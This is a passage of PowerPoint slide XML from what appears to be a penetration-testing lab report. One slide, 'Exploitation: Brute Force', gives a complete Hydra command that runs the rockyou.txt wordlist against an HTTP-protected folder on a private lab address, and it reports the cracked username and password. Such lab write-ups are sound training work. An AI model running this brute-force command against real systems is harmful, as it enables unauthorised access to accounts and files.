          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="924" r="9341" t="37503"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2809400" y="3641025"/>
            <a:ext cx="3668151" cy="11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Exploitation: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Brute Force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10" name="Google Shape;1110;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="833750" y="1200150"/>
            <a:ext cx="3581100" cy="177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62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="834050" y="1200178"/>
            <a:ext cx="34971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Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr b="1"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Hydra was used along with the password list “rockyou.txt” &amp; names found on the website that would be used in place of the username “ashton” was used for the exploit.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latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="700">
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr sz="7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latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t> hydra -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="700">
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="700">
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t> -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="700">
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t> 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="700">
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>92.168.1.105 http-get http://192.168.1.105/company_folders/secret_folder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2" name="Google Shape;1112;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="647681" y="851703"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1113" name="Google Shape;111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4" name="Google Shape;111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5" name="Google Shape;1115;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5072550" y="1200175"/>
            <a:ext cx="3314100" cy="177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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5072525" y="1200191"/>
            <a:ext cx="32376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Achievements</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200"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eorgia"/>
              <a:buAutoNum type="arabicPeriod"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The exploit gave a confirmation of login: </a:t>
            </a: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ashton </a:t>
            </a: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and password: </a:t>
            </a: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leopoldo</a:t>
            </a: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eorgia"/>
              <a:buAutoNum type="arabicPeriod"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It also granted access to the </a:t>
            </a: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/secret_folder</a:t>
            </a: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 directory using this credentials.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17" name="Google Shape;1117;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="757338" y="3152638"/>
            <a:ext cx="7629300" cy="1446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8" name="Google Shape;1118;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4543" l="0" r="9893" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-15">
            <a:off x="1158500" y="3344978"/>
            <a:ext cx="6827000" cy="1061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9" name="Google Shape;1119;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="647681" y="2793653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1120" name="Google Shape;112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62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4954681" y="85170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